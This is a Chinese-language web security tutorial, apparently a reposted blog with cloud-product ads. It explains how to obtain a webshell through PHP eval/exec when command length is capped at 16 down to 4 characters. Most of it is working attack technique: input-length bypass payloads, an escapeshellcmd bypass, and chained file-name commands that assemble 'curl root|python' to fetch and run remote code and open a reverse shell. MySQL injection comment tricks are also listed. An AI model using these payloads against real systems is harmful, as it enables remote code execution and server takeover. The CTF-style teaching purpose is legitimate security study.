如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
RDS MySQL Serverless 高可用系列,价值2615元额度,1个月
简介: 如何在命令长度受限的情况下成功get到webshell(函数参数受限突破、mysql的骚操作)

0x01 问题提出

还记得上篇文章记一次拿webshell踩过的坑(如何用PHP编写一个不包含数字和字母的后门),我们讲到了一些PHP的一些如何巧妙地绕过数字和字母受限的技巧,今天我要给大家分享的是如何在命令长度受限的情况下成功get到webshell,以及关于函数参数受限的突破,mysql的一些骚操作技巧~~~

0x02 问题分析

我们先看个例子:

<?php
    $param = $_REGUEST['param'];
    if(strlen($param) < 17){
        eval($param);
    }
?>

上面这部分意思只是叫我们绕过长度受限就可以执行代码。这个其实就很简单了,我们可以采用调用eval或者assert这种后门函数就可以直接绕过了~~

eval函数中参数是字符,比如像下面这样子:

eval('echo 1;');

assert函数中参数为表达式(或者为函数),我们可以像下面这样子去实现:

assert(phpinfo()) 

而我参看了PHP手册才了解到,assert是函数,eval不是函数,是一种语言构造器,eval($a)中$a只能是字符串,assert($a)中$a可以是php代码,也可以是php代码的字符串。assert($a)的$a如果是字符串形式不能有2个以上的分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现。

例如像下面这个样子:

assert(eval("echo 1;echo 2;"));

结果如下:

img_716a3b5e395df187416a9391eaaa85c4.png


比如像上面这句,如果是assert(eval("echo 1;echo 2")),这样写是不会执行echo 1也不会执行echo 2的,因为eval使用的字符串要是有分号的php语句,只要有字符串,它就可以当作命令来执行~~

更多细节我们可以参看PHP手册:

eval函数:http://www.php.net/manual/zh/function.eval.php

assert函数:http://php.net/manual/zh/function.assert.php

那如果像下面这个例子呢?

<?php
    $param = $_REGUEST['param'];
    if(
        strlen($param) < 17 &&
        stripos($param, 'eval') == false &&
        stripos($param, 'assert') == false
    ){
        eval($param);
    }
?>


striops函数是用来查找目标字符串在字符串中第一次出现的位置。这里的意思是限制了长度最长为 16 个字符,而且不能用 evalassert,这样我们又该怎么执行命令。

我们可以通过命令执行来绕过限制:

param=`$_GET[1]`;&1=bash


当然了,我们也可以用 exec函数:


param=exec($_GET[1]);

exec可以执行一个外部程序,具体的可以参看PHP手册:http://php.net/manual/zh/function.exec.php

那如果是这个呢?

<?php
    $command = 'dir '.$_POST['dir'];
    $escaped_command = escapeshellcmd($command);
    var_dump($escaped_command);
    file_put_contents('out.bat',$escaped_command);
    system('out.bat');
?>

我们对其进行测试:


img_c920936f65dadaf14dcd0ed1f61a89e0.png


我们应该如何去绕过呢?

我们来看看这些函数,escapeshellcmd() 函数对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec()system() 函数,或者执行操作符之前进行转义。

escapeshellcmd() 函数的详细用法参看PHP手册:http://php.net/manual/zh/function.escapeshellcmd.php

那么这个函数具体会转义哪些字符呢?

我们通读了源码可以知道,下图这些字符都可以用^来取代其意义。也就是没办法用& | 来执行其他命令,只能列目录

img_9b9bffb6c54e1fa47e8293769773cefd.png


感兴趣的同学可以研究一下源码,我把源码传到本地了:https://files.cnblogs.com/files/ECJTUACM-873284962/exec.rar

那么我们萌生了一个这样的一个tips:执行.bat文件的时候,利用%1a,可以绕过过滤执行命令,我们做了如下尝试:

img_d0e951bad941c97db34e2fc6ae94ade2.png


前面我们已经说了如何限制在16个字符内的情况下拿到webshell,在二进制漏洞利用中,当我们遇到可控数据只有8字节的情况,去掉字符串尾的\0,限制在7个字符。那么在这种情况下,我们又该怎么办呢?

还是看之前那个例子,把命令长度变成7。

<?php
    $param = $_REGUEST['param'];
    if(strlen($param) < 8){
        eval($param);
    }
?>

这让我想起赵本山演的那个小品《钟点工》里面的一个问题,把大象放进冰箱应该分为几步?

此时我们需要铺垫一些基础知识了。

我们可以进行命令的拼装。

我们来个条件更加苛刻的问题,命令长度限制在5,如何完成注入,成功get到webshell呢?

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

举个例子,我们要执行echo hello这个命令,我们应该怎么办呢?

我们可以进行如下构造:

>echo
>hello

结果如下:

img_438d3878c6d4210963d086a3196203fb.png

我们可以看到创建了两个文件,分别是echo和hello,我们执行*命令

img_8612904d74731a8e2e4a11d03d61d813.png


我们可以看到,执行了echo hello这行命令,所以直接打印出了hello字符串

我们可以通过echo *来查看一下*里面的内容


img_d3614bcee6d17b97ae055db920ad50fa.png


我们通过将>echo和>hello 完成命令拼接,然后用* 组成并执行了命令echo hello

如果条件再苛刻一点呢?把命令长度限制在4,如何完成注入,成功get到webshell呢?


<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

比如,我们想要执行ls -l命令,我们可以模仿上面这种做法,进行如下构造:

>ls
>-l

结果如下:

img_a0b00a7755d09744fb98cf92c6e9fffb.png

我们可以看到创建了两个文件,分别是ls和-l,我们执行*命令


img_0b4a665dfb1b277ef596dbc1c265f315.png

诶,这咋回事啊,咋还报错了呢?

其实啊,我们刚才生成的echo和hello,e的ASCII值要小于h,所以排序的时候自动将echo排在前面,hello排在后面,而ls我们可以看到,此时文件的显示顺序是-l在ls的前面。如果我们执行* 其实是执行-l ls会弹出报错信息

img_fae28f53e9442ce63046122de103a720.png

那么我们又该如何获得ls -l呢?

0x03 解决方案

01.命令内容反序

最简单的一种方式就是按照命令内容反着转过来。

我们可以这个命令字符序列反过来看l- sl,这样是不是顺序正好满足要求呢?接下来我们只需要用一个可以把字符反过来的命令rev,就可以完成这个功能

所以首先第一步,我们先创建了两个文件,分别是l-sl。

>l-
>sl

结果如下:


img_d85e943c246ec1446391aa74b8826435.png

然后将l- sl组合写入文件v,然后查看v文件里面的内容。

img_7dc99a44361dad45159600a2f4b79ed1.png

这里面我们可以看到文件v中多了一个v,对我们命令造成干扰,如果我们只想文件中存在l-sl,那该怎么办呢?

这里有个小trick,dir a b>c这个命令可以将a b写到文件c中,不会写入多余的命令进去。

我们创建一个名为dir的文件,然后执行*>v,可以获得l- ls

>dir
echo *
*>v
cat v


结果如下:

img_e55d255b450cb98236071e7defbd6139.png

然后我们就只需要对这个命令字符序列反转一下就行了,这里我们有一个rev命令,正好可以将内容反序。

所以我们需要产生一个名为rev的文件,然后执行*v,此时命令相当于rev v,命名为v是为了被通配符匹配,这样就产生了我们要的输出ls -l

>rev
ls
*v

结果如下:


img_e8da97bc701bed143afed40dc8a17a0f.png


然后就是输出到文件x,然后就可以执行sh x,成功以4个字符执行长度为5的ls -l命令。

*v>x
cat x
sh x

结果如下:


img_c70245c04335001b9e92db944a989782.png

把上面写的命令编成一个shell脚本如下:

*v>x
cat x
sh x

结果如下:

img_c70245c04335001b9e92db944a989782.png


把上面写的命令编成一个shell脚本如下:

#!/usr/bin/env bash
>l-
>sl
>dir
*>v
>rev
*v>x
sh x


我们可以看到,整个命令链长度均小于等于4,这样我们就可以愉快的执行ls -l命令了~

02.时间排序技巧

在ls命令里面有个参数-t,可以根据出现的时间进行排序,先生成的文件排在后面,后生成的文件排在前面,类似于栈的结构。

假设我们要生成ls -t >g命令,它的逆序是g< t- sl,按照ASCII值排序方式的话,t-会在sl后面,不满足需求。所以我们变通一下,生成命令ls -th >g,逆序就是g> ht- sl,正好满足顺序要求。

>g\>
>ht-
>sl
>dir
*>v
>rev
*v>x
cat x

结果如下:

img_1d051c7070649601ba6f074c68f32c98.png


03.续行符技巧拼接命令

Linux里面有个神奇的符号\(反斜杠),可以进行命令的续行,比如下面这个例子,我创建了两个文件a和b,我们通过ls命令查看效果和续行效果是一样的。

>a
>b
ls
l\
s


结果如下:


img_874007ae10cd0d4ff9a3d0d899855bb4.png

这样,我们就可以构造一连串的拼接命令进行续行操作。再比如,我要构造命令curl root|python

>on
>th\\
>py\\
>\|\\
>ot\\
>ro\\
>\ \\
>rl\\
>cu\\
ls -t

结果如下:

img_abf522c9d9d20fe5dde47705dea95f58.png

这里我们可能会有点疑问,>th\这里看着是5个字符,超过了4个的限制,实际上是因为shell环境需要输入\产生\,但是php代码exec时,只需要输入\即可产生\,比如 exec(“>th\”)即可。所以这里实际上是不超过4个字符的。

我们再执行ls -th>g,把这些按照时间顺序导入到g文件里面,再查看一下g文件


img_c98a500ad21176cafc8592e6fb1d9348.png

然后执行sh g反弹shell即可,这里我就不演示给大家看了,大家可以自己在本机上进行尝试即可~~

这里对如何在命令长度受限的情况下成功get到webshell做个小结:

  • w长度最短的命令
  • ls -t 以创建时间来列出当前目录下所有文件
  • 文件列表以[换行符]分割每个文件
  • 引入 `\` 转义ls时的换行
  • 换行不影响命令执行
  • 成功构造任意命令执行,写入Webshell

关于mysql部分还有一些注释技巧,我给大家列一下:

  • [#] 行内注释
  • [-- ] 行内注释,注意末尾的空格
  • [/*...*/] 段注释,可多行
  • [`] 某些情况下,可以作为注释
  • [;] 支持多句执行的情况下,可直接用分号闭合第一句SQL语句


相关实践学习
如何在云端创建MySQL数据库
开始实验后,系统会自动创建一台自建MySQL的 源数据库 ECS 实例和一台 目标数据库 RDS。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
1月前
|
JSON 关系型数据库 MySQL
Mysql(5)—函数
MySQL提供了许多内置的函数以帮助用户进行数据操作和分析。这些函数可以分为几类,包括聚合函数、字符串函数、数值函数、日期和时间函数、控制流函数等。
70 1
Mysql(5)—函数
|
14天前
|
关系型数据库 MySQL Serverless
MySQL函数
最常用的MySQL函数,包括聚合函数,字符串函数,日期时间函数,控制流函数等
|
15天前
|
缓存 监控 关系型数据库
如何根据监控结果调整 MySQL 数据库的参数以提高性能?
【10月更文挑战第28天】根据MySQL数据库的监控结果来调整参数以提高性能,需要综合考虑多个方面的因素
54 1
|
1月前
|
tengine 关系型数据库 MySQL
Tengine、Nginx安装MySQL数据库命令教程
本指南详细介绍了在Linux系统上安装与配置MySQL数据库的步骤。首先通过下载并安装MySQL社区版本,接着启动MySQL服务,使用`systemctl start mysqld.service`命令。若启动失败,可尝试使用`sudo /etc/init.d/mysqld start`。利用`systemctl status mysqld.service`检查MySQL的服务状态,确保其处于运行中。通过日志文件获取初始密码,使用该密码登录数据库,并按要求更改初始密码以增强安全性。随后创建一个名为`tengine`的数据库,最后验证数据库创建是否成功以及完成整个设置流程。
|
2月前
|
存储 SQL 关系型数据库
【MySQL调优】如何进行MySQL调优?从参数、数据建模、索引、SQL语句等方向,三万字详细解读MySQL的性能优化方案(2024版)
MySQL调优主要分为三个步骤:监控报警、排查慢SQL、MySQL调优。 排查慢SQL:开启慢查询日志 、找出最慢的几条SQL、分析查询计划 。 MySQL调优: 基础优化:缓存优化、硬件优化、参数优化、定期清理垃圾、使用合适的存储引擎、读写分离、分库分表; 表设计优化:数据类型优化、冷热数据分表等。 索引优化:考虑索引失效的11个场景、遵循索引设计原则、连接查询优化、排序优化、深分页查询优化、覆盖索引、索引下推、用普通索引等。 SQL优化。
541 15
【MySQL调优】如何进行MySQL调优?从参数、数据建模、索引、SQL语句等方向,三万字详细解读MySQL的性能优化方案(2024版)
|
17天前
|
SQL NoSQL 关系型数据库
|
1月前
|
存储 SQL 关系型数据库
MySQL 存储函数及调用
MySQL 存储函数及调用
56 3
|
1月前
|
缓存 关系型数据库 MySQL
MySQL 满足条件函数中使用查询最大值函数
MySQL 满足条件函数中使用查询最大值函数
120 1
|
1月前
|
SQL 关系型数据库 MySQL
数据库:MYSQL参数max_allowed_packet 介绍
数据库:MYSQL参数max_allowed_packet 介绍
61 2
|
2月前
|
存储 SQL 关系型数据库
MySQL基础:函数
本文介绍了MySQL中几种常用的内建函数,包括字符串函数、数值函数、日期函数和流程函数。字符串函数如`CONCAT()`用于拼接字符串,`TRIM()`用于去除字符串两端的空格,`MOD()`求余数,`RAND()`生成随机数,`ROUND()`四舍五入。日期函数如`CURDATE()`返回当前日期,`NOW()`返回当前日期和时间,`DATE_ADD()`添加时间间隔,`DATEDIFF()`计算日期差。流程函数如`IF()`和`CASE WHEN THEN ELSE END`用于条件判断。聚合函数如`COUNT()`统计行数,`SUM()`求和,`AVG()`求平均值
29 8
MySQL基础:函数